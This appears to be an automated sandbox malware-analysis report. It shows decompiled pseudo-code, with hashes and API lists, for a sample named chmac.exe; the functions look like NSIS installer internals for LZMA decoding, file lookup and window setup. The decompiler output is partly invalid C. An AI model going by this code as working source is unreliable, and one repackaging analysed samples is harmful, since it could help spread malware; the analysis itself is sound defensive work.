						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00405D7C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405D7C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224e8;
			}

0x00405d87
0x00405d90
0x00000000
0x00405d9d
0x00405d93
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,74E5F560,004053BE,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,74E5F560), ref: 00405D87
FindClose.KERNEL32(00000000), ref: 00405D93

Strings

$B, xrefs: 00405D7D

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: $B
API String ID: 2295610775-2366330246
Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD

Uniqueness

Uniqueness Score: -1.00%

Function 004035E3, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 213
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004035E3() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t59;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				struct HINSTANCE__* _t75;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x423eb0; // 0x80f8a0
				_t20 = E00405DA3(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x420498;
					"1033" = 0x7830;
					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
					__eflags =  *0x420498;
					if(__eflags == 0) {
						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E004059E3("1033",  *_t20() & 0x0000ffff);
				}
				E00403897(_t75, _t87);
				_t24 =  *0x423eb8; // 0x80
				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x423f20 = _t24 & 0x00000020;
				if(E00405659(_t87, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405659(_t95, _t84) == 0) {
						_t8 = _t80 + 0x118; // 0x4a
						E00405AA7(0, _t78, _t80, _t84,  *_t8);
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403897(_t75, __eflags);
							__eflags =  *0x423f40; // 0x0
							if(__eflags != 0) {
								_t31 = E00404EF5(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420470, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t85;
								RegisterClassA(0x423640);
							}
							_t39 =  *0x423680; // 0x0
							_t42 = DialogBoxParamA( *0x423ea0, _t39 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x423ea0; // 0x400000
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 = _t75;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t1 = _t80 + 0x48; // 0x0
					_t75 =  *_t1;
					if(_t75 == 0) {
						goto L16;
					}
					_t2 = _t80 + 0x4c; // 0x0
					_t59 =  *0x423ed8; // 0x814930
					_t78 = 0x422e40;
					_t75 = _t75 + _t59;
					_t3 = _t80 + 0x44; // 0x0
					E0040596C( *_t3, _t75,  *_t2 + _t59, 0x422e40, 0);
					_t61 =  *0x422e40; // 0x70
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x422e41;
						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E00405A85(_t84, E00405578(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E004055BF(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x004035e9
0x004035f2
0x004035f9
0x004035fb
0x0040360f
0x00403621
0x0040362b
0x00403630
0x00403636
0x00403649
0x00403649
0x00403654
0x004035fd
0x00403608
0x00403608
0x00403659
0x0040365e
0x00403663
0x0040366c
0x00403678
0x004036ff
0x00403707
0x00403709
0x00403710
0x00403710
0x00403726
0x0040372c
0x0040373a
0x004037c9
0x004037d1
0x004037db
